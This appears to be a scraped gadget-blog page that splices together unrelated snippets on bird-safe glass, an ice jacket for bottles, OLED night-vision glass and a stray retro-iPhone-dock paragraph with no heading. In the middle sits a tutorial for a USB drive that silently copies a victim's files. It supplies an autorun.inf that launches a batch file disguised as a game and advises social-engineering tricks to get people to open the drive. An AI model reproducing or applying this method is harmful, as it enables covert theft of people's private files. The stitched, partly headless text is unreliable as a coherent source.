• Invisible Spider-Glass Stops Birds Crashing | Gadget Lab | Wired.com

    In much the same way that your cat doesn’t understand mirrors and tries to fight its own reflection silly kitty!, a bird just doesn’t see a big glass window. Thus, it tries to fly on through and smashes its little skull down into its bird-brain. Thunk.Thankfully for our little feathered friends, there is a solution. Ornilux glass, from Arnold Glas, has a special UV coating which is invisible to us, but easy for birds to see due to eyes that see different wavelengths. A new version of this glass, called Ornilux Mikado, takes things a step further by printing a spider’s-web of UV stripes onto the panes.Birds aren’t arachnophobes, but spiders apparently design their webs to warn off birds and stop them flying through and destroying the silky structures. The new Mikado pattern mimics the patterns used by spiders.According to Treehugger, the glass reduces bird-collisions by 75%. Given that 250,000 a birds are killed by windows every day in Europe, and around 100 million per year in the States, that’s a lot of rescued birds.My parents could have done with something like this when I was a cry-baby child back in the 1970s and the local birdies would take one look at our full-length living-room, glazed front and back, and think one word in their tiny heads: “Shortcut.” Thunk. They’d drop to the floor, dazed or dead, and I would start bawling once again.

  • How to make flash drive that copy’s users files silently and automatically

    How to make flash drive that copy’s users files silently and automatically.

    ****** THIS INSTRUCTABLE IS FOR INFORMATION PURPOSES ONLY IT IS ILEGAL TO COPY SOMEONES FILES WITHOUT THEIR PERMISSION I AM NOT RESPONSABLE FOR ANY THING THAT MAY OR MAYNOT HAPPEN IF THIS INFORMATION IS USED IMPROPERLY****************

    How to build a simple five file usb drive that copy’s current user’s favorites, pictures, and video folders to the thumb drive automatically and silently when inserted. Can also be customized for other files that need to be copied.

    usbdrive

    step 1Materials needed

    Let me first say this is my first instructable… so be nice. Any help in making it better would be nice.

    Flash/thumb drive 8gb– $25.00.
    computer to write files on.
    someone to try out thumb drive on.

    Just a note, you can use any size thumb drive I used 8gb it was on sale when I bought it. Also the more space you have on the drive the better… just incase the target computer has LOTS of files you will have the space to copy to.

    Ok there is no order in the file creation process just that you have all files created and on the flash drive. I will start out with the autorun.inf. This file is used when you insert the flash drive into said computer. Also used to change the thumb drive icon to something more acceptable for social engineering.

    Here is the code, you will have to open a simple word editor such as word, you can past this code into word and edit to your hearts content.
    [autorun]
    icon=drive.ico
    open=launch.bat
    action=Click ok to Run game for Windows
    shell\open\command=launch.bat
    a couple of notes
    the code is between the lines not the lines at all so dont put them in your autorun file. also when you save this file after editing or pasing this in the editor make shure you save it as all files and put a .inf after it… like this autorun.inf

    look at pic two if you have any issues.

    You can change the icon to your tastes what you will have to do is find a .png a png file is an icon file. Anyways just save it to the drive name it drive.ico next time you pull the drive out and put it in you will have your custom icon. Great for social engineering if the situation arises, makes it much less of an issue to have someone click a file on the drive if it looks like a game or something.

    next is the open= command this code takes the launch batch file and opens it.. more on the launch batch file later.

    next it action= this can change to suit your needs, when the autorun launches it sometimes may ask the user what to open dependent on what you put here is what the user will think he is clicking on in the code above it tells the user to click here to run game for windows. This code acts as a backup just in case the user is asked what to open.

    The shell/open command also acts as a backup in case the user clicks cancel instead of open when prompted… this code will execute when the drive letter is clicked on. No user can hold back on seeing what is in a random flash drive. That is the basis for this code.

  • Keep Your Drinks COLD!

    While we don’t have the technology to tote around a portable fridge wherever we go with minimal fuss, there is always an alternative in the form of the Ice Jacket. Meant to chill your favorite bottle of poison to perfection, it does so by encasing your bottle of spirit or other liquor in a dramatic layer of ice, making sure its contents are always served chill. This is a unique, one-of-a-kind product that’s fun and incredibly impressive. You are also able to create beautiful ice sculptures, thanks to the unique design of the Ice Jacket which will surely go a long way in impressing your friends while making sure the mercury remains low where your drink is concerned. Of course, it takes a few hours to get the Ice Jacket up and “working” so to speak, but the results are well worth the wait.

This is definitely the tool to have if you want to introduce something more retro to your home or office, letting you make and receive calls in the old fashioned manner while making sure your iPhone remains charged to the hilt whenever it is docked. Other features include a couple of stereo speakers, a microphone, volume control, instant mute as well as a choice between USB or AC for its power. Guess the iPhone just got a wee bit smarter, eh?

  • OLED technology helps glass see in the dark

    About a week ago I talked about how some OLED Organic Light Emitting Diodes technology could turn an ordinary pane of glass into a display called a T-OLED. Today I would like to talk about how OLED could turn ordinary glass into a night-vision screen.This tech comes to us from both DARPA and the University of Florida. It is a new material made from seven OLED layers, which have the ability to get “excited” by infrared light. Once light passes through these layers, they get amplified by the next layer, which turns what was once dark into light.Sounds very cool, doesn’t it? Too bad that the only sample of this tech that they have is one square centimeter. I’m guessing that you would have to squint really hard to see the image from the photo.I’m also guessing that the best use of this technology would be on eyeglasses, windshields, windows, and any other place where seeing in the dark is necessary. I’m sure that this tech is by no means cheap, just like the aforementioned T-OLED.Now, if only there was a way to combine the T-OLED tech with this night vision tech. That would certainly be something to see, all right. I swear, the future is already looking brighter at just the thought of that.
